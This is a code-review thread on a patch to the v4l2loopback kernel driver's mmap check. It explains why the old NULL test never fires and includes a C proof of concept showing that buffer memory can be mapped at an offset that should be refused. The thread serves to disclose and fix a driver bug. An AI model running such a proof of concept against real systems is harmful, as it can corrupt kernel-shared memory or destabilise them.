v4l2loopback.c

```diff
@@ -1915,7 +1915,7 @@ static int v4l2_loopback_mmap(struct file *file, struct vm_area_struct *vma)
 				break;
 		}
 
-		if (NULL == buffer)
+		if (i >= dev->buffers_number)
```

Comment:
at a quick glance this looks bogus to the point of maliciousness.

could you explain which problem this is trying to solve and how?

Reply:
If you have a look at the loop above that changed line, you will notice that `buffer` is ALWAYS assigned a non-`NULL` value. Thus the original condition (`if(NULL == buffer)`) is never hit. Looking at the code of the `for` loop above you see that there are checks for the pointers to compare equal; i.e. the for loop checks that at least for one buffer index `i` the pointer of that buffer matches to the one provided by the user.

What this patch does is abuse the excessive scope of loop variables in C89 to check if the loop was terminated early by using break (in which `i` is the last active value for that loop iteration) or if the loop ended without finding the address we are looking for (in which case `i` is an "out-of-bounds" value of the found buffer index, as the continuation condition of the for loop returned false). Thus an equivalent change would be `if(!(i < dev->buffers_number))`.

Reply:
Here some small PoC to demonstrate the issue:
```c
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/videodev2.h>

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>

void hax0r_out(char* message, bool success, int err) {
    printf("%s: %s\n", message, success ? "\033[1;32msuccess\033[0m" : "\033[1;31mfailed\033[0m");
    if(!success) {
        printf("ERROR %d: %s\n", err, strerror(err));
        exit(1);
    }
}

static void loopback_init(int fdwr, int w, int h) {

	struct v4l2_capability vid_caps;
	struct v4l2_format vid_format;

	size_t linewidth = w * 2;
	size_t framesize = h * linewidth;

	int ret_code;

	ret_code = ioctl(fdwr, VIDIOC_QUERYCAP, &vid_caps);
    hax0r_out("Querying device capabilities", ret_code >= 0, errno);

	memset(&vid_format, 0, sizeof(vid_format));
	vid_format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
	vid_format.fmt.pix.width = w;
	vid_format.fmt.pix.height = h;
	vid_format.fmt.pix.pixelformat = V4L2_PIX_FMT_YUYV;
	vid_format.fmt.pix.sizeimage = framesize;
	vid_format.fmt.pix.field = V4L2_FIELD_NONE;
	vid_format.fmt.pix.bytesperline = linewidth;
	vid_format.fmt.pix.colorspace = V4L2_COLORSPACE_SRGB;

	ret_code = ioctl(fdwr, VIDIOC_S_FMT, &vid_format);
    hax0r_out("Setting frame format", ret_code >= 0, errno);

	ret_code = ioctl(fdwr, VIDIOC_STREAMON, &vid_format.type);
    hax0r_out("Activate video streaming", ret_code >= 0, errno);
}

static void loopback_free(int fdwr) {
	const enum v4l2_buf_type type = V4L2_BUF_TYPE_VIDEO_OUTPUT;

	int ret_code = ioctl(fdwr, VIDIOC_STREAMOFF, &type);
    hax0r_out("Deactivate video streaming", ret_code >= 0, errno);
}

int main(int argc, char **argv) {
    char *dev;
    int fd;
    char *ptr1, *ptr2;

    if (argc < 2) {
        hax0r_out("Checking arguments", false, EINVAL);
    }

    dev = argv[1];
    hax0r_out("Checking device filename", strlen(dev), EINVAL);

    fd = open(dev, O_RDWR | O_CLOEXEC);
    hax0r_out("Opening device", fd >= 0, errno);

    loopback_init(fd, 800, 600);

    /* Here be exploits … */
    ptr1 = mmap(NULL, 962560, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    hax0r_out("Mapping start section of buffer 0", ptr1 != MAP_FAILED, errno);

    ptr2 = mmap(NULL, 962560, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 4096);
    hax0r_out("Mapping middle section of buffer 0 (should fail)", ptr2 != MAP_FAILED, errno);

    ptr1[4096] = 0;
    ptr2[0] = 42;
    hax0r_out("Checking written data from second segment", ptr1[4096], 0);

    hax0r_out("Unmapping segment 2", munmap(ptr2, 962560) >= 0, errno);
    hax0r_out("Unmapping segment 1", munmap(ptr1, 962560) >= 0, errno);

    loopback_free(fd);

    hax0r_out("Closing device", close(fd) >= 0, errno);
    return 0;
}
```